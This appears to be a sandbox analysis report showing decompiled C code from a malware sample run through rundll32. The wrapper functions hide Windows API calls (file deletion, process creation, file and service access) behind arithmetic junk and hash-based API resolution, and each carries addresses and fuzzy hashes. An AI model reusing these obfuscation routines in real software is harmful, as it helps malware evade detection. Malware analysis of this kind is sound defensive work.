                                                                                                          				_v8 = 0xa209ee;
                                                                                                          				_v8 = _v8 + 0x62d2;
                                                                                                          				_v8 = _v8 ^ 0x3d892cf6;
                                                                                                          				_v8 = _v8 | 0x5ca7d1ce;
                                                                                                          				_v8 = _v8 ^ 0x7da8dabc;
                                                                                                          				E04CBEB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
                                                                                                          				_t63 = DeleteFileW(_t69); // executed
                                                                                                          				return _t63;
                                                                                                          			}















                                                                                                          0x04cbd068
                                                                                                          0x04cbd06b
                                                                                                          0x04cbd06d
                                                                                                          0x04cbd070
                                                                                                          0x04cbd074
                                                                                                          0x04cbd075
                                                                                                          0x04cbd07a
                                                                                                          0x04cbd081
                                                                                                          0x04cbd087
                                                                                                          0x04cbd08e
                                                                                                          0x04cbd095
                                                                                                          0x04cbd09c
                                                                                                          0x04cbd0a3
                                                                                                          0x04cbd0a7
                                                                                                          0x04cbd0ae
                                                                                                          0x04cbd0b5
                                                                                                          0x04cbd0bc
                                                                                                          0x04cbd0c0
                                                                                                          0x04cbd0c7
                                                                                                          0x04cbd0ce
                                                                                                          0x04cbd0d5
                                                                                                          0x04cbd0dc
                                                                                                          0x04cbd0e3
                                                                                                          0x04cbd0ef
                                                                                                          0x04cbd0f7
                                                                                                          0x04cbd0fa
                                                                                                          0x04cbd101
                                                                                                          0x04cbd108
                                                                                                          0x04cbd10f
                                                                                                          0x04cbd116
                                                                                                          0x04cbd11d
                                                                                                          0x04cbd13c
                                                                                                          0x04cbd145
                                                                                                          0x04cbd14b

                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04CBD145
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID: 3l}!$7XJ
                                                                                                          • API String ID: 4033686569-2205417827
                                                                                                          • Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                          • Instruction ID: 3a748d3cba2c01ba521581f14764c51642f78f377b395d2e0c149fb43283d247
                                                                                                          • Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                          • Instruction Fuzzy Hash: A72134B5D00318AFDF08DFA4C98A9DEFBB0FF14304F108188E966A6210D7B89B558F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 51%
                                                                                                          			E04CD2C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				void* _t49;
                                                                                                          				int _t56;
                                                                                                          				WCHAR* _t60;
                                                                                                          
                                                                                                          				_push(_a56);
                                                                                                          				_t60 = __ecx;
                                                                                                          				_push(_a52);
                                                                                                          				_push(0);
                                                                                                          				_push(_a44);
                                                                                                          				_push(_a40);
                                                                                                          				_push(0);
                                                                                                          				_push(_a32);
                                                                                                          				_push(_a28);
                                                                                                          				_push(_a24);
                                                                                                          				_push(_a20);
                                                                                                          				_push(0);
                                                                                                          				_push(_a12);
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t49);
                                                                                                          				_v32 = 0x534833;
                                                                                                          				_v28 = 0;
                                                                                                          				_v24 = 0;
                                                                                                          				_v8 = 0x70adbe;
                                                                                                          				_v8 = _v8 >> 5;
                                                                                                          				_v8 = _v8 << 0xa;
                                                                                                          				_v8 = _v8 | 0x1d11c356;
                                                                                                          				_v8 = _v8 ^ 0x1f145645;
                                                                                                          				_v20 = 0xecea8a;
                                                                                                          				_v20 = _v20 | 0x5baa72b8;
                                                                                                          				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                          				_v16 = 0x76217f;
                                                                                                          				_v16 = _v16 >> 0x10;
                                                                                                          				_v16 = _v16 | 0xe98780dc;
                                                                                                          				_v16 = _v16 ^ 0xe98c1e91;
                                                                                                          				_v12 = 0xeb975;
                                                                                                          				_v12 = _v12 ^ 0xd8138edb;
                                                                                                          				_v12 = _v12 | 0x0b4171d5;
                                                                                                          				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                          				E04CBEB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                          				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                          				return _t56;
                                                                                                          			}













                                                                                                          0x04cd2c2c
                                                                                                          0x04cd2c31
                                                                                                          0x04cd2c33
                                                                                                          0x04cd2c36
                                                                                                          0x04cd2c37
                                                                                                          0x04cd2c3a
                                                                                                          0x04cd2c3d
                                                                                                          0x04cd2c3e
                                                                                                          0x04cd2c41
                                                                                                          0x04cd2c44
                                                                                                          0x04cd2c47
                                                                                                          0x04cd2c4a
                                                                                                          0x04cd2c4b
                                                                                                          0x04cd2c4e
                                                                                                          0x04cd2c4f
                                                                                                          0x04cd2c51
                                                                                                          0x04cd2c52
                                                                                                          0x04cd2c57
                                                                                                          0x04cd2c61
                                                                                                          0x04cd2c64
                                                                                                          0x04cd2c67
                                                                                                          0x04cd2c6e
                                                                                                          0x04cd2c72
                                                                                                          0x04cd2c76
                                                                                                          0x04cd2c7d
                                                                                                          0x04cd2c84
                                                                                                          0x04cd2c8b
                                                                                                          0x04cd2c92
                                                                                                          0x04cd2c99
                                                                                                          0x04cd2ca0
                                                                                                          0x04cd2ca4
                                                                                                          0x04cd2cab
                                                                                                          0x04cd2cb2
                                                                                                          0x04cd2cb9
                                                                                                          0x04cd2cc0
                                                                                                          0x04cd2cc7
                                                                                                          0x04cd2ce8
                                                                                                          0x04cd2d02
                                                                                                          0x04cd2d09

                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04CD2D02
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID: 3HS
                                                                                                          • API String ID: 963392458-330188696
                                                                                                          • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                          • Instruction ID: dc6ee3bcdb85a5cc515478d28939c094ab6578e8bb842d7358478af3f4b96a62
                                                                                                          • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                          • Instruction Fuzzy Hash: 8421F272800248BBCF159F96DC0ACDFBFB9EB85704F108188F915A2220C3B59A24DFA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 56%
                                                                                                          			E04CD45CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* _t51;
                                                                                                          				void* _t60;
                                                                                                          				WCHAR* _t64;
                                                                                                          
                                                                                                          				_push(_a48);
                                                                                                          				_t64 = __ecx;
                                                                                                          				_push(_a44);
                                                                                                          				_push(_a40);
                                                                                                          				_push(_a36);
                                                                                                          				_push(_a32);
                                                                                                          				_push(_a28);
                                                                                                          				_push(_a24);
                                                                                                          				_push(_a20);
                                                                                                          				_push(_a16);
                                                                                                          				_push(_a12);
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t51);
                                                                                                          				_v28 = 0x204d4f;
                                                                                                          				_v24 = 0;
                                                                                                          				_v20 = 0xd27984;
                                                                                                          				_v20 = _v20 | 0x43788b11;
                                                                                                          				_v20 = _v20 ^ 0x43f3df42;
                                                                                                          				_v16 = 0xf976f1;
                                                                                                          				_v16 = _v16 + 0xffff3d74;
                                                                                                          				_v16 = _v16 | 0xfc5c4419;
                                                                                                          				_v16 = _v16 ^ 0xfcfdb6fc;
                                                                                                          				_v12 = 0xb7df7c;
                                                                                                          				_v12 = _v12 + 0xffff3658;
                                                                                                          				_v12 = _v12 * 0x13;
                                                                                                          				_v12 = _v12 ^ 0x1f30f970;
                                                                                                          				_v12 = _v12 ^ 0x12ab006a;
                                                                                                          				_v8 = 0x8ba8ca;
                                                                                                          				_v8 = _v8 | 0x62aa166a;
                                                                                                          				_v8 = _v8 + 0xa2f6;
                                                                                                          				_v8 = _v8 * 0x55;
                                                                                                          				_v8 = _v8 ^ 0xc33acf6c;
                                                                                                          				E04CBEB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
                                                                                                          				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
                                                                                                          				return _t60;
                                                                                                          			}












                                                                                                          0x04cd45d2
                                                                                                          0x04cd45d7
                                                                                                          0x04cd45d9
                                                                                                          0x04cd45dc
                                                                                                          0x04cd45df
                                                                                                          0x04cd45e2
                                                                                                          0x04cd45e5
                                                                                                          0x04cd45e8
                                                                                                          0x04cd45eb
                                                                                                          0x04cd45ee
                                                                                                          0x04cd45f1
                                                                                                          0x04cd45f4
                                                                                                          0x04cd45f5
                                                                                                          0x04cd45f7
                                                                                                          0x04cd45f8
                                                                                                          0x04cd45fd
                                                                                                          0x04cd4607
                                                                                                          0x04cd460a
                                                                                                          0x04cd4611
                                                                                                          0x04cd4618
                                                                                                          0x04cd461f
                                                                                                          0x04cd4626
                                                                                                          0x04cd462d
                                                                                                          0x04cd4634
                                                                                                          0x04cd463b
                                                                                                          0x04cd4642
                                                                                                          0x04cd465d
                                                                                                          0x04cd4660
                                                                                                          0x04cd4667
                                                                                                          0x04cd466e
                                                                                                          0x04cd4675
                                                                                                          0x04cd467c
                                                                                                          0x04cd4688
                                                                                                          0x04cd468b
                                                                                                          0x04cd469e
                                                                                                          0x04cd46b5
                                                                                                          0x04cd46bc

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 04CD46B5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID: OM
                                                                                                          • API String ID: 823142352-4198367855
                                                                                                          • Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                          • Instruction ID: 859a27c977318e896f97e96771190292d1b1ed621331dba2c258828e71951f7b
                                                                                                          • Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                          • Instruction Fuzzy Hash: D721EE72801249BB8F05DFA9CD458DEBFB6EF88304F508199F914A6220D3768A61AF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 58%
                                                                                                          			E04CD44FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                          				unsigned int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* _t47;
                                                                                                          				intOrPtr* _t57;
                                                                                                          				void* _t58;
                                                                                                          				signed int _t60;
                                                                                                          				signed int _t61;
                                                                                                          
                                                                                                          				E04CCFE29(_t47);
                                                                                                          				_v20 = 0xa68a31;
                                                                                                          				_t60 = 0x6d;
                                                                                                          				_v20 = _v20 / _t60;
                                                                                                          				_v20 = _v20 ^ 0x00000260;
                                                                                                          				_v16 = 0xfa9629;
                                                                                                          				_v16 = _v16 + 0x734b;
                                                                                                          				_v16 = _v16 ^ 0x638d356d;
                                                                                                          				_v16 = _v16 ^ 0x637ea9c8;
                                                                                                          				_v8 = 0x3f26ab;
                                                                                                          				_v8 = _v8 ^ 0xcdd207a4;
                                                                                                          				_v8 = _v8 ^ 0xb6eb62c4;
                                                                                                          				_v8 = _v8 >> 0xd;
                                                                                                          				_v8 = _v8 ^ 0x0005a548;
                                                                                                          				_v12 = 0xe291fe;
                                                                                                          				_t61 = 0x24;
                                                                                                          				_v12 = _v12 / _t61;
                                                                                                          				_v12 = _v12 + 0x3d74;
                                                                                                          				_v12 = _v12 ^ 0x00095158;
                                                                                                          				_t57 = E04CBEB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
                                                                                                          				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
                                                                                                          				return _t58;
                                                                                                          			}












                                                                                                          0x04cd4517
                                                                                                          0x04cd451c
                                                                                                          0x04cd452d
                                                                                                          0x04cd4532
                                                                                                          0x04cd4537
                                                                                                          0x04cd453e
                                                                                                          0x04cd4545
                                                                                                          0x04cd454c
                                                                                                          0x04cd4553
                                                                                                          0x04cd455a
                                                                                                          0x04cd4561
                                                                                                          0x04cd4568
                                                                                                          0x04cd456f
                                                                                                          0x04cd4573
                                                                                                          0x04cd457a
                                                                                                          0x04cd4584
                                                                                                          0x04cd458c
                                                                                                          0x04cd458f
                                                                                                          0x04cd4596
                                                                                                          0x04cd45b2
                                                                                                          0x04cd45c4
                                                                                                          0x04cd45c9

                                                                                                          APIs
                                                                                                          • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 04CD45C4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleInformation
                                                                                                          • String ID: XQ
                                                                                                          • API String ID: 3935143524-1200779947
                                                                                                          • Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
                                                                                                          • Instruction ID: 6a4ad7dfb87f8cc6d7733d6588be6945d42beb5af18c71717c8db21e787c6179
                                                                                                          • Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
                                                                                                          • Instruction Fuzzy Hash: 0E213871E40208FBEF04CFA5DC4AADEBBB1EB54704F108189B910A6290D3B59A649F40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 65%
                                                                                                          			E04CBEE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* _t34;
                                                                                                          				void* _t41;
                                                                                                          				void* _t44;
                                                                                                          
                                                                                                          				_push(_a20);
                                                                                                          				_t44 = __edx;
                                                                                                          				_push(_a16);
                                                                                                          				_push(_a12);
                                                                                                          				_push(_a8);
                                                                                                          				_push(_a4);
                                                                                                          				_push(__edx);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t34);
                                                                                                          				_v20 = 0xea751a;
                                                                                                          				_v20 = _v20 | 0xe9b69993;
                                                                                                          				_v20 = _v20 ^ 0xe9f29d6b;
                                                                                                          				_v16 = 0x605393;
                                                                                                          				_v16 = _v16 | 0xcc974431;
                                                                                                          				_v16 = _v16 ^ 0xccf8b40a;
                                                                                                          				_v12 = 0x102a1a;
                                                                                                          				_v12 = _v12 + 0xcb09;
                                                                                                          				_v12 = _v12 ^ 0x001131dd;
                                                                                                          				_v8 = 0x570378;
                                                                                                          				_v8 = _v8 >> 5;
                                                                                                          				_v8 = _v8 ^ 0xef617e60;
                                                                                                          				_v8 = _v8 ^ 0xef696bf9;
                                                                                                          				E04CBEB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
                                                                                                          				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
                                                                                                          				return _t41;
                                                                                                          			}










                                                                                                          0x04cbee69
                                                                                                          0x04cbee6c
                                                                                                          0x04cbee6e
                                                                                                          0x04cbee71
                                                                                                          0x04cbee74
                                                                                                          0x04cbee77
                                                                                                          0x04cbee7a
                                                                                                          0x04cbee7b
                                                                                                          0x04cbee7c
                                                                                                          0x04cbee81
                                                                                                          0x04cbee8b
                                                                                                          0x04cbee92
                                                                                                          0x04cbee99
                                                                                                          0x04cbeea0
                                                                                                          0x04cbeea7
                                                                                                          0x04cbeeae
                                                                                                          0x04cbeeb5
                                                                                                          0x04cbeebc
                                                                                                          0x04cbeec3
                                                                                                          0x04cbeeca
                                                                                                          0x04cbeece
                                                                                                          0x04cbeed5
                                                                                                          0x04cbeef6
                                                                                                          0x04cbef05
                                                                                                          0x04cbef0b

                                                                                                          APIs
                                                                                                          • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04CBEF05
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: OpenService
                                                                                                          • String ID: `~a
                                                                                                          • API String ID: 3098006287-142445290
                                                                                                          • Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
                                                                                                          • Instruction ID: 9bb6d539efae591f793f72b41b48b2f752057aea1ec1fa532fb950aad61e327c
                                                                                                          • Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
                                                                                                          • Instruction Fuzzy Hash: 2E11F275C01218FBDF48EFA5DD0A8DEBFB5EB04314F108588F92562261D3B59A20EF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 82%
                                                                                                          			E04CC0C2A(void* __ecx, void* __edx, intOrPtr _a8, void* _a12) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* _t46;
                                                                                                          				char _t58;
                                                                                                          				signed int _t60;
                                                                                                          				void* _t64;
                                                                                                          
                                                                                                          				_push(_a12);
                                                                                                          				_t64 = __ecx;
                                                                                                          				_push(_a8);
                                                                                                          				_push(0);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t46);
                                                                                                          				_v16 = 0x79e79;
                                                                                                          				_v16 = _v16 ^ 0xb862d7cb;
                                                                                                          				_v16 = _v16 >> 4;
                                                                                                          				_v16 = _v16 | 0x4697e44e;
                                                                                                          				_v16 = _v16 ^ 0x4f9f071e;
                                                                                                          				_v12 = 0xdc68bd;
                                                                                                          				_t60 = 0xe;
                                                                                                          				_v12 = _v12 / _t60;
                                                                                                          				_v12 = _v12 * 0x34;
                                                                                                          				_v12 = _v12 * 0x65;
                                                                                                          				_v12 = _v12 ^ 0x42f8253a;
                                                                                                          				_v8 = 0xfd7031;
                                                                                                          				_v8 = _v8 << 0xc;
                                                                                                          				_v8 = _v8 << 0x10;
                                                                                                          				_v8 = _v8 * 0x63;
                                                                                                          				_v8 = _v8 ^ 0x300ea1ef;
                                                                                                          				_v20 = 0x966242;
                                                                                                          				_v20 = _v20 ^ 0xca1ad729;
                                                                                                          				_v20 = _v20 + 0x5c3c;
                                                                                                          				_v20 = _v20 ^ 0xca8d5c90;
                                                                                                          				E04CBEB52(_t60, _t60, 0x5a6a6a19, 0x146, 0xa2289af1);
                                                                                                          				_t58 = RtlFreeHeap(_t64, 0, _a12); // executed
                                                                                                          				return _t58;
                                                                                                          			}











                                                                                                          0x04cc0c31
                                                                                                          0x04cc0c34
                                                                                                          0x04cc0c36
                                                                                                          0x04cc0c39
                                                                                                          0x04cc0c3c
                                                                                                          0x04cc0c3d
                                                                                                          0x04cc0c42
                                                                                                          0x04cc0c4c
                                                                                                          0x04cc0c55
                                                                                                          0x04cc0c59
                                                                                                          0x04cc0c60
                                                                                                          0x04cc0c67
                                                                                                          0x04cc0c73
                                                                                                          0x04cc0c7b
                                                                                                          0x04cc0c8e
                                                                                                          0x04cc0c95
                                                                                                          0x04cc0c98
                                                                                                          0x04cc0c9f
                                                                                                          0x04cc0ca6
                                                                                                          0x04cc0caa
                                                                                                          0x04cc0cb2
                                                                                                          0x04cc0cb5
                                                                                                          0x04cc0cbc
                                                                                                          0x04cc0cc3
                                                                                                          0x04cc0cca
                                                                                                          0x04cc0cd1
                                                                                                          0x04cc0ce4
                                                                                                          0x04cc0cf2
                                                                                                          0x04cc0cf8

                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,CA8D5C90), ref: 04CC0CF2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: 0c6a47905900e195d1ca513eee3b4fb9fb84d9477b38fddb19f92484bcd3f647
                                                                                                          • Instruction ID: d2554fd1267cc232a0807689b8300975696169fa8df1e8bb3807dfaea58b1854
                                                                                                          • Opcode Fuzzy Hash: 0c6a47905900e195d1ca513eee3b4fb9fb84d9477b38fddb19f92484bcd3f647
                                                                                                          • Instruction Fuzzy Hash: 7921E275D01209FFDB04DFA5C946A9EBBB5EF05704F108099E921BB290D3B4AB50DF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 76%
                                                                                                          			E04CC648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                          				signed int _v8;
                                                                                                          				unsigned int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* _t41;
                                                                                                          				void* _t49;
                                                                                                          				long _t52;
                                                                                                          
                                                                                                          				_push(_a16);
                                                                                                          				_t52 = __ecx;
                                                                                                          				_push(_a12);
                                                                                                          				_push(_a8);
                                                                                                          				_push(_a4);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t41);
                                                                                                          				_v12 = 0x3cd3f;
                                                                                                          				_v12 = _v12 << 3;
                                                                                                          				_v12 = _v12 | 0xc677f757;
                                                                                                          				_v12 = _v12 >> 7;
                                                                                                          				_v12 = _v12 ^ 0x0188bcff;
                                                                                                          				_v20 = 0x40fc9e;
                                                                                                          				_v20 = _v20 << 4;
                                                                                                          				_v20 = _v20 ^ 0x040306b1;
                                                                                                          				_v16 = 0x159e9f;
                                                                                                          				_v16 = _v16 + 0xffffd0d5;
                                                                                                          				_v16 = _v16 * 0x33;
                                                                                                          				_v16 = _v16 ^ 0x04433238;
                                                                                                          				_v8 = 0x8a430d;
                                                                                                          				_v8 = _v8 + 0xffffdfbc;
                                                                                                          				_v8 = _v8 | 0x5356d001;
                                                                                                          				_v8 = _v8 + 0x638e;
                                                                                                          				_v8 = _v8 ^ 0x53d0144a;
                                                                                                          				E04CBEB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
                                                                                                          				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
                                                                                                          				return _t49;
                                                                                                          			}










                                                                                                          0x04cc6491
                                                                                                          0x04cc6494
                                                                                                          0x04cc6496
                                                                                                          0x04cc6499
                                                                                                          0x04cc649c
                                                                                                          0x04cc64a0
                                                                                                          0x04cc64a1
                                                                                                          0x04cc64a6
                                                                                                          0x04cc64b0
                                                                                                          0x04cc64b4
                                                                                                          0x04cc64bb
                                                                                                          0x04cc64bf
                                                                                                          0x04cc64c6
                                                                                                          0x04cc64cd
                                                                                                          0x04cc64d1
                                                                                                          0x04cc64d8
                                                                                                          0x04cc64df
                                                                                                          0x04cc64fa
                                                                                                          0x04cc64fd
                                                                                                          0x04cc6504
                                                                                                          0x04cc650b
                                                                                                          0x04cc6512
                                                                                                          0x04cc6519
                                                                                                          0x04cc6520
                                                                                                          0x04cc6534
                                                                                                          0x04cc6543
                                                                                                          0x04cc6549

                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04CC6543
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                          • Instruction ID: a7d586b9514b9c81d9dd1d5c9b5c50f8ed51119a0b1ad0b7079ee09493ad4df8
                                                                                                          • Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                          • Instruction Fuzzy Hash: 8E1100B2C0121DFBDF06DFA5D9098CEBBB5FB00314F108598E821A6250E3B59B249F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 70%
                                                                                                          			E04CCE8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				unsigned int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* _t29;
                                                                                                          				void* _t37;
                                                                                                          
                                                                                                          				_push(_a16);
                                                                                                          				_push(_a12);
                                                                                                          				_push(0);
                                                                                                          				_push(_a4);
                                                                                                          				_push(0);
                                                                                                          				E04CCFE29(_t29);
                                                                                                          				_v20 = 0xc8e76b;
                                                                                                          				_v20 = _v20 | 0x270203a1;
                                                                                                          				_v20 = _v20 ^ 0x27c97096;
                                                                                                          				_v16 = 0x55aebc;
                                                                                                          				_v16 = _v16 >> 2;
                                                                                                          				_v16 = _v16 ^ 0x00171a80;
                                                                                                          				_v12 = 0xfad6fe;
                                                                                                          				_v12 = _v12 ^ 0xd14a4d1d;
                                                                                                          				_v12 = _v12 ^ 0xd1b10da7;
                                                                                                          				_v8 = 0x428060;
                                                                                                          				_v8 = _v8 * 0x54;
                                                                                                          				_v8 = _v8 ^ 0x15de1a76;
